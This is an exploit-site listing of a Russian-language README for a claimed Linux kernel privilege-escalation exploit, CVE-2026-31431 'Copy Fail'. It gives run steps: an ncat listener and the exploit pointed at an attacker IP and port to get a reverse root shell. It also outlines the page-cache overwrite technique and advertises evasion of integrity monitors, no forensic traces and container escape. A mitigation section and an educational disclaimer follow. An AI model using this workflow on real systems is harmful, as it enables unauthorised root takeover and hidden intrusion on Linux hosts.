Sploitus

CVE-2026-31431-RCE-Exploit

kitploit · 2026-08-27

Exploit Code

MARKDOWN115 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M4XSEC-CVE-2026-31431-RCE-EXPLOIT
# 🔴 CVE-2026-31431 — «Copy Fail»

### 9-летняя логическая ошибка в ядре Linux, дающая root за секунды

![CVE](https://img.shields.io/badge/CVE-2026--31431-red?style=for-the-badge) ![CVSS](https://img.shields.io/badge/CVSS-7.8%20HIGH-orange?style=for-the-badge) ![Kernel](https://img.shields.io/badge/Linux%20Kernel-4.14%E2%80%937.0--rc-blue?style=for-the-badge) ![Since](https://img.shields.io/badge/Introduced-August%202017-yellow?style=for-the-badge)

* * *

## Обзор

**Copy Fail** — это уязвимость локального повышения привилегий (LPE) высокой степени серьёзности в криптографической подсистеме ядра Linux (`algif_aead`). Обнаруженная и раскрытая компанией **Theori** (с помощью их инструмента анализа уязвимостей на базе ИИ **Xint Code**) **29 апреля 2026 года** , эта ошибка позволяет любому непривилегированному локальному пользователю записать 4 контролируемых байта в page cache любого читаемого файла — и использовать это для получения **root** практически на всех основных дистрибутивах Linux, выпущенных с 2017 года.

Рабочий proof-of-concept эксплойт занимает всего **~732 байта Python**.

* * *

## Эксплуатация

  1. Запустите Ncat Listener



root@kitploit:~
    
    
    sudo ncat -lvnp PORT
    

  2. Выполните эксплойт на целевой машине



root@kitploit:~
    
    
    # Использование Python-скрипта
    python3 CVE-2026-31431-Exploit.py IP PORT
    
    # Скомпилированный бинарник
    chmod +x CVE-2026-31431-Exploit
    ./CVE-2026-31431-Exploit IP PORT
    

* * *

## 🧬 Техническая сводка

### Как работает эксплойт (4 шага)

  1. **Откройте** сокет `AF_ALG` и привяжитесь к `authencesn(hmac(sha256),cbc(aes))`
  2. **Сделайте splice** страниц читаемого setuid-бинарника в сокет
  3. Черновая запись AEAD в ядре перезаписывает **4 байта** в page cache этого бинарника
  4. **Выполните** теперь повреждённый setuid-бинарник → **root shell**



### Почему это опасно

  * **Нет окна гонки** — детерминированно, срабатывает каждый раз
  * **Не требуется обход смещения ядра / KASLR**
  * **Один и тот же эксплойт работает во всех дистрибутивах** — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky и др.
  * **Побег из контейнера** — page cache является общим; запись изнутри контейнера затрагивает хост
  * **Без изменения диска** — мониторы целостности файлов (AIDE, OSSEC и др.) не обнаружат это
  * **Нет криминалистических следов на диске**



* * *

## 🎯 Затронутые версии

### Подтверждённые уязвимые дистрибутивы

  * Ubuntu 24.04 LTS
  * Amazon Linux 2023
  * RHEL 10.1
  * SUSE 16
  * Rocky Linux 9.7



> По сути, **каждый крупный дистрибутив Linux, выпущенный с 2017 года** , затронут.

* * *

## 🛡️ Смягчение последствий

### 1\. Патч (рекомендуется)

Обновите ядро до версии, содержащей исправляющий коммит `fafe0fa2995a`. Большинство крупных дистрибутивов выпустили или выпускают обновлённые пакеты ядра.

### 2\. Временные обходные меры

Если вы не можете применить патч немедленно:

  * **Заблокируйте создание сокетов AF_ALG** с помощью политики seccomp
  * **Внесите модуль`algif_aead` в чёрный список:**

root@kitploit:~
        
        echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
        sudo modprobe -r algif_aead 2>/dev/null
        




## ⚠️ Отказ от ответственности

Этот репозиторий предназначен **только для образовательных и защитных целей**. Информация здесь призвана помочь командам безопасности понять, обнаружить и смягчить CVE-2026-31431. Всегда соблюдайте практики ответственного раскрытия и действующее законодательство.

* * *

### ⭐ Поставьте звёзду этому репозиторию, чтобы быть в курсе патчей и рекомендаций по обнаружению.